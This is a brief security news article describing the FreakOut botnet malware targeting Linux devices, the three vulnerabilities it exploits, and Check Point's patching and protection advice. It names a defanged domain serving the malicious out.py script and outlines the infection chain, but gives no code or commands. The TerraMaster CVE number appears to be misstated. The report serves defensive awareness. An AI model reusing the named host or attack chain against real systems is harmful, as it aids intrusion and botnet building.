A new malware variant is being used in attacks on Linux devices that sees the devices added to a botnet and used for cryptocurrency mining and distributed-denial-of-service (DDoS) attacks. The new malware, dubbed FreakOut, places an infected device under the control of the botnet operator and used for remote attacks on other vulnerable devices.
The malware variant was identified by researchers at Check Point who believe it is distributed through the exploitation of three vulnerabilities: A critical deserialization bug in Zend Framework (CVE-2021-3007), a popular collection of library packages used for building web applications; a remote code execution flaw in the TerraMaster TOS (CVE-2021-28188) operating system used in its data storage devices; and a critical deserialization of untrusted data flaw in Liferay Portal (CVE-2020-7961), an open-source enterprise portal that is used for developing web portals and websites.
Once one of the above flaws has been successfully exploited, the attackers use a Python script (out.py) which is downloaded from https://gxbrowser[.]net. The script is given permissions then run using Python 2. If the script is run it gathers information and fingerprints the infected device, conducts port scans, and data packet and network sniffing. The script is also capable of conducting brute force attacks using hard coded passwords to gain access to and infect other devices on the network.
Check Point researchers say 185 devices are known to have been infected with the malware and between January 8 and January 13, 380 attacks on its customers were blocked. Most of the attacks have been on organizations in the financial services, healthcare, and government agencies in the United States and Western Europe.
Patches have been released to fix all three vulnerabilities, so users should ensure the products are updated and running the latest version of the software. Check Point also recommends implementing an Intrusion Prevention System (IPS) to block attempts to exploit vulnerabilities in systems and applications, conventional signature-bd antivirus solutions on endpoints, and a comprehensive advanced endpoint protection solution.